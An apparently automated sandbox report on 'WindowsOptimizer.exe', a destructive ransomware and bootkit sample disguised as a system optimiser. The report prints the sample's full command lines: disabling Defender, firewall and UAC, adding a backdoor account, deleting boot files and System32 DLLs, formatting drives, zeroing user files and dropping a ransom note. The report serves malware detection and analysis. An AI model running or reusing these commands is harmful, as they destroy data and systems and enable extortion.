Malware Analysis Report

2024-11-13 18:05

Sample ID 241109-1aw26a1rcs
Target WindowsOptimizer.exe
SHA256 d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b
Tags
bootkit defense_evasion discovery evasion execution persistence privilege_escalation ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b

Threat Level: Known bad

The file WindowsOptimizer.exe was found to be: Known bad.

Malicious Activity Summary

bootkit defense_evasion discovery evasion execution persistence privilege_escalation ransomware trojan

UAC bypass

Modifies boot configuration data using bcdedit

Disables RegEdit via registry modification

Stops running service(s)

Disables Task Manager via registry modification

Modifies Windows Firewall

Writes to the Master Boot Record (MBR)

Indicator Removal: File Deletion

Enumerates connected drives

Launches sc.exe

Event Triggered Execution: Netsh Helper DLL

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Runs net.exe

Suspicious use of SendNotifyMessage

Modifies registry key

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 21:27

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 21:27

Reported

2024-11-09 21:58

Platform

win7-20240903-en

Max time kernel

2s

Max time network

3s

Command Line

"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion execution

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\X: C:\Windows\system32\mountvol.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\format.com N/A
File opened (read-only) \??\E: C:\Windows\system32\format.com N/A

Indicator Removal: File Deletion

defense_evasion

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\fsutil.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2088 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1812 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1812 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1812 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2564 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2564 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2564 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2088 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2848 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2848 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2848 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2832 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2832 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2832 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2088 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2760 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2760 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2760 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2088 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2840 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2840 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2840 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2264 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2720 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2720 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2720 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2636 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2636 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2088 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2892 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2892 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2892 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2088 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1576 wrote to memory of 2740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe

Processes

C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled

C:\Windows\system32\sc.exe

sc config wuauserv start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll

C:\Windows\system32\net.exe

net user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AssertNew.cmd"

C:\Windows\system32\cipher.exe

cipher /E /A /S:C:\Users\Admin\Desktop

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f

C:\Windows\system32\bcdedit.exe

bcdedit /delete {bootmgr} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\BlockConfirm.mp4"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CheckpointCopy.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteMove.cab"

C:\Windows\system32\bcdedit.exe

bcdedit /delete {default} /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mountvol X: /s

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteUpdate.mpe"

C:\Windows\system32\mountvol.exe

mountvol X: /s

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mountvol X: /d

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertApprove.wvx"

C:\Windows\system32\mountvol.exe

mountvol X: /d

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertToStep.js"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CopyShow.xlsx"

C:\Windows\system32\format.com

format C: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DebugShow.ps1"

C:\Windows\system32\efsui.exe

efsui.exe /efs /keybackup

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DisableClose.docx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y

C:\Windows\system32\format.com

format D: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\EnterComplete.asx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y

C:\Windows\system32\format.com

format E: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ExportResume.au"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportConfirm.doc"

C:\Windows\system32\bcdedit.exe

bcdedit /delete {current} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportExport.pot"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\InstallDisconnect.DVR-MS"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinOut.cfg"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\LimitAdd.xml"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeProtect.mov"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PingConvertTo.mp4v"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopUnregister.potm"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoClose.xlsx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RenameSync.docx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectInitialize.mov"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SendRevoke.vsx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SetClose.AAC"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartUninstall.bmp"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepHide.mpeg"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopJoin.lock"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopRedo.vdx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SuspendDebug.asp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 21:27

Reported

2024-11-09 21:28

Platform

win10v2004-20241007-en

Max time kernel

2s

Max time network

3s

Command Line

"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion execution

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\system32\format.com N/A
File opened (read-only) \??\E: C:\Windows\system32\format.com N/A
File opened (read-only) \??\X: C:\Windows\system32\mountvol.exe N/A

Indicator Removal: File Deletion

defense_evasion

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1480 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 4288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1204 wrote to memory of 4288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4844 wrote to memory of 1172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1480 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1484 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1484 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 3944 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 3944 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1480 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
